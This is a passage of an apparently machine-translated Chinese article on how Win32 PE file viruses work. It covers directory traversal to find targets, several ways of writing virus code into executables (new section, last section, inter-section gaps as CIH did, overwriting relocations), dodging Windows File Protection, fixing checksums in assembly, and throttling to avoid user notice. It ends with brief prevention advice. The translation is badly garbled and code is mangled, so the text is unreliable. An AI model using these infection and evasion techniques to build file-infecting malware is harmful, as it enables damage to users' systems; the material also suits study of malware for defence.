Printf ("% s //% s / n", cpath, wfd.cfilename); // virus can determine whether to infect the corresponding file according to the suffix name}} while (r = findnextfile (hfd, & wfd), r! = 0);} setcurrentdirectory (cdir);

In short 20 multi-line C code, the function of file traversal is implemented. The powerful features of Win32 API not only provide developers, but also open their convenience for the virus. Using assembly is a slightly complex, interested readers can refer to the ENUM_PATH part in Elkern, the principle is the same, limited to the space here no longer give the corresponding assembly code. Non-recipient search does not use the stack storage related information, and use a configuration of the explicitly assigned linked list or stack and other structural storage related information, apply an iterative loop to complete recursive traversal, the following is the use of the linked list to handle the subdirectory list A simple implementation:

When implemented in assembly language, you need to manage the linked list and assign and release the corresponding structure, so it is more cumbersome, the amount of code is slightly large, so the virus is multi-use in a recursive manner. It is worth noting that the search deep directory is very time, so most of the viruses will call Sleep sleep after the CPU usage is too high, and the SLEP sleep will be called to avoid sensitive users. The file search and infection modules are usually running in a separate thread. After the virus is controlled, create a corresponding search and infection thread, and hand it over to the original program.

* Modification and infection strategy of PE file

Since all files in disk and network sharing files have been able to search, you are parasitic, then natural next step is to infect searching PE files. A very important consideration of the PE is to write the virus code to the PE file. Reading and writing documents generally use Win32 API CREATEFILE, CREATEFILEMAPPING, MAPVIEWOFFILE and other APIs to do memory map files, which avoids the trouble of managing buffers, thus being used for more viruses. In order to read and write files with read-only properties, the virus first uses getFileAttribute before the operation, and saves it, then use setFileAttribute to modify the file's properties to write, restore its property value after the infection is completed. Generally speaking, there are several ways of infection with PE files: a) Add a new section. Write the virus code into a new section, modify the value of the file size and the like in the file size in the file header. Since an increase in a section at the end of the PE, it is easily perceived by the user. In some cases, since the original PE header has no sufficient space to store new section table information, it is also necessary to move other data. In view of the above problems, there are not many PE viruses. B) Additional on the last festival. Modify the size and attributes of the last section table and attribute values ​​such as file size in the file header. Since more and more anti-virus software uses a tail scan, many viruses are also attached to the virus code to escape the random data to escape the scan. Modern PE virus uses a lot of ways. C) Write to the gap preserved by each section of the PE file header. The PE header is generally 1024 bytes, and there are 5-6 ordinary PE files actually occupy only about 600 bytes, there are still more than 400 bytes of remaining spaces available. There is generally aligned with 512 bytes, but the actual data in the section often does not completely use all 512 bytes, and the Alignment of the PE file is originally considered for efficiency, but it left The gap has left the virus. The total length of this infection method infection is not increased, so since the CIH virus is used for the first time, it has been favored by viral authors. D) Override some very data. As the registration table of the general EXE file, since EXE generally does not require relocation, it can override the relocation data without problems. Insurance, the corresponding item in the DataDirectory array in the file header can be clear, This approach generally does not cause an increase in the length of the infected file. Therefore, many viruses also use this method. e) Compress some data or code to save space to store viral code, then write the virus code into these spaces, before running the virus first decompressed the corresponding data or code, then hand it over to the original program . This approach generally does not increase the size of the infected file, but there are more factors that need to be considered, and the difficulty is difficult. Not much with it. Regardless of the way, it involves the relevant information about the PE header and the section table. We first study the modification of PE, that is, how to make PE files after adding the virus code, it is still possible to be The system loader loads execution.

Attributes of each section of the PE file are described by a table item in the section table, and the section table is followed behind image_nt_headers, so finding the start offset of Image_NT_HEADERS from the file offset 0x3c, plus IMAGE_NT_HEADERS size (248 bytes) to the start position of the positioning section table, each table entry is a IMAGE_SECTION_HEADER structure: typedef struct _IMAGE_SECTION_HEADER {bYTE name [IMAGE_SIZEOF_SHORT_NAME]; // the name of the section union {DWORD PhysicalAddress; DWORD VirtualSize; // Byte calculation actual size} Misc; DWORD VIRTUALADDRESS; // Start virtual address DWORD SIZEOFRAWDATA; / / Follow the file headalignment // Aligned in DWORD POINTORAWDATA; // file points to this festival Offset DWORD POINTERTORELOCATION; DWORD POINTERTOLINENUMBERS; Word NumberOfrel Co.; Word Numberoflinenumbers; DWORD Characteristics; // Attribute} image_section_header, * pimage_section_header;

The number of knots items is determined by image_nt_headers' NumberOfSections members. The starting virtual addresses in the section table and the location in the file can be converted to the mapping relationship between the memory virtual address and the address in the file. Add a section, you need to modify this section of the table where you add an entries, then modify the number of NumberOfSections. It is worth noting that some PE file existing festival tables may follow other data, such as Bound Import data, if you do not simply add a knot entry, you need to move this data and modify the corresponding structure before you can increase Section, otherwise the PE file will not be executed normally. Since many viruses are self-modified, the feature is typically set to E000XXXX, indicating that the section readable write, otherwise it is necessary to call the API dynamically modified memory page at the beginning of the virus to call the VirtualProtect. The definition of the above table can also be seen that the actual data of each section is aligned in the file header, this size is generally 512, so each section may have unused spaces that do not exceed 512 bytes (SizeOfrawData- Virtualsize, this is just to the virus, the famous CIH virus first adopts this technique, but the problem is that the void size of each section is uncertain, so it is necessary to divide the virus code into several parts, run By combining a code, the advantage is that if the virus code is small, there is no need to increase the size of the PE, which is stronger. If all the unused spaces are still insufficient to accommodate the viral code, you can add a holiday or attached to the last section. Attached to the last festival is relatively simple, as long as the VirtualSize in the last section in the section table, and the SizeOfrawData members who press FileAlignment alignment. Of course, in the case of all the modifications described above, if the size of the file is changed, the size of the value in the file header is to be corrected, which is all the size of the section and the header to the SECTIONALIGNMENT. There are two problems here that the first question is the processing of the WFP (Windows File Protection) file, the WFP mechanism is a mechanism for the new protection system file from Windows 2000. If the system discovers important system files, Popping a dialog warning user This file has been replaced. There are of course a variety of ways to bypass WFP protection, but for viruses, a simpler method is to do not infect system files in the WFP list. You can use SFC.dll's export function sfcisfileProtace to determine if a file is in this list, the first parameter of the API must be 0, and the second parameter is the file name to be judged, if it returns non-0 value in the list, otherwise Returns 0. Another problem is the check of PE files. Most PE files do not use the checksum values ​​of the Checksum domain in the file head, but some PE files, such as the key system service program file, and the driver file must be correct, otherwise the system loader will refuse to load. The CHECKSUM of the PE header can use imagehlp.dll's export function CHECKSUMMAPPEDFILE calculation, or after clearing the domain, calculates according to the following simple equivalent algorithm: If the PE file size is an odd digital, it is completed in 0. Press the noble numbers. Clear 0 of the CHECKSUM field of the PE file head, and then perform the ADC operation in two bytes, and finally and the accumulated and the actual size of the same file will be the value of the checksum.

The following Cal_Checksum process assumes that the ESI has pointed to the PE file header, the file header checksum field has been cleared 0, the CF flag has been reset:; call example:; clc; push pe_fileseize; call cal_checksum cal_Checksum: ADC BP, Word [ESI] Initial ESI points to the file header, saved in EBX is the file size Inc ESI Inc ESI loop Cal_checksum MOV EBX, [ESP 4] ADC EBP, EBX; EBP is stored in PE's check and RET 4 except PE headers In addition to checksum, many programs they also have calibration modules, such as Winzip and WinRar self-extracting files, if they are infected, will result in normally decompression. Therefore, for similar PE files, the virus should be as not infected. Elkern's infected file modified file related code in Infect.asm, the virus first stores its own code as much as possible using the gap of the head and section of the PE, and if all gaps are still not enough to store viral code, they are attached to the last section. On, limited to space-related code from a whisper, interested readers please refer to it. In fact, the code snippet of the above function is already a simple virus, whether it is written in assembly language, C language or Python language. But these are not all of the virus technology. In decades of virus and anti-virus confrontation, with the advancement of anti-virus technology, the virus technology is also constantly improving, Win32's memory resident infection technology, anti-analysis technology, EPO technology, polymorphism, deformation technology It has not been introduced by the space, no matter what, it is the content of the next part. * Thinking and preventing virus technology originating from programming practices, but it is impossible to include considerable programming skills. If we are good at reference, many of them can be used to solve common programming problems. In addition, you know each other, you can calm down on the virus, and analyze your mechanism, find a better solution. As a user, understanding the mechanism of the virus is also very helpful for choosing a suitable anti-virus product and program. Prevent viruses, except for the use of anti-virus software regularly from the user's perspective, cautiously download or perform unknown procedures, and it is very important to improve the alert. The virus is no longer simply a means of displaying high super programming techniques, and more and more people have given other economy, sometimes even political meaning. Prevent viruses, as a responsible programmer, should first do not write viruses, spread viruses, everything starts with me.

* References [1] The PE file format, LUEVELSMEYER [2] Microsoft Portable Executable and Common Object File Format Specification, Microsoft Corp. [3] An In-Depth Look into the Win32 Portable Executable File Format, Matt Pietrek [4] 29A Issue7

Author brief introduction Wen Yujie, male, is engaged in network security work. The main research field is malicious code, reverse engineering, artificial intelligence, compilation theory, underlying safety technology, etc. Has been translated with Luo Yunbin "Intel assembly language programming", with people with "software encryption technology insider".

转载请注明原文地址:https://www.9cbs.com/read-131193.html

New Post(0)